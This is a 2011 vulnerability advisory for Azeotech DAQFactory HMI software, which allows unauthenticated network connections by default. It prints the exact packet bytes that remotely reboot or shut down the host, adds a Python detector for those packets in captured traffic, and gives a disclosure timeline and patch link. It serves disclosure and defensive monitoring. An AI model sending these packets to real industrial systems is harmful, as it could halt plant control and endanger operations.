nSense Vulnerability Research Security Advisory - The default configuration in Azeotech DAQFactory allows network connections towards the HMI without authentication. This allows an attacker on the network to shut down the machine running the HMI software by sending a simple packet.
nSense Vulnerability Research Security Advisory NSENSE-2011-004
---------------------------------------------------------------
Affected Vendor: Azeotech
Affected Product: DAQFactory
Platform: Windows
Impact: Remote reboot/shutdown
Vendor response: Patch
CVE: None
Credit: Knud / nSense
Technical details
---------------------------------------------------------------
The default configuration allows network connections towards
the HMI without authentication. This allows an attacker on the
network to shut down the machine running the HMI software by
sending a packet as outlined below:
preamble:
"\x01\x00\x09\x00CPassword\x00"
reboot:
"\x01\x00\x0f\x00CCommandGeneric\x01\x00\x00\x00\x04\x00\x00\x00"
shutdown:
"\x01\x00\x0f\x00CCommandGeneric\x01\x00\x00\x00\x06\x00\x00\x00"
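For monitoring on the HMI network segment, the byte strings above can be recognised in captured TCP payloads. The following is an added example, not part of the original advisory or vendor code; the record layout (16-bit little-endian tag 0x0001, 16-bit name length, ASCII class name, then two 32-bit values for CCommandGeneric) is an assumption inferred from those byte strings, and the function names are hypothetical.

```python
import struct

# Byte strings exactly as listed in the advisory.
PREAMBLE = b"\x01\x00\x09\x00CPassword\x00"
REBOOT = b"\x01\x00\x0f\x00CCommandGeneric\x01\x00\x00\x00\x04\x00\x00\x00"
SHUTDOWN = b"\x01\x00\x0f\x00CCommandGeneric\x01\x00\x00\x00\x06\x00\x00\x00"
ACTIONS = {4: "reboot", 6: "shutdown"}  # command codes from the advisory


def read_name(buf, off):
    """Parse one record header at off; return (name, next_offset) or None."""
    if off + 4 > len(buf):
        return None
    tag, length = struct.unpack_from("<HH", buf, off)
    end = off + 4 + length
    if tag != 1 or length == 0 or end > len(buf):
        return None
    name = buf[off + 4:end]
    return (name, end) if name.isalnum() else None


def find_commands(payload):
    """Return labels for the advisory's records found in one TCP payload."""
    findings, off = [], 0
    while off < len(payload):
        rec = read_name(payload, off)
        if rec is None:
            off += 1  # resynchronise on the next byte
            continue
        name, off = rec
        if name == b"CPassword":
            findings.append("preamble")
        elif name == b"CCommandGeneric":
            if off + 8 > len(payload):
                findings.append("truncated-command")
                break
            _, code = struct.unpack_from("<II", payload, off)
            findings.append(ACTIONS.get(code, "command:%d" % code))
            off += 8
    return findings


if __name__ == "__main__":
    # Constructed capture: preamble followed by the shutdown record.
    print(find_commands(PREAMBLE + SHUTDOWN))
```

Any finding from a source that is not an authorised engineering workstation is worth alerting on, since the default configuration accepts these records without authentication.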
Timeline:
20110412 Contacted ICS-CERT
20110413 ICS-CERT acknowledges receipt of information
20110413 ICS-CERT creates ticket # ICS-VU-240775
20110502 Vendor creates patch, releases advisory to customers
20110625 ICS-CERT releases advisory
20110727 Vendor responds, CVE assigned, patch 20110809
Solution
Install the latest version from the vendor:
http://www.azeotech.com/downloads.php
Links:
http://www.nsense.fi
http://www.nsense.dk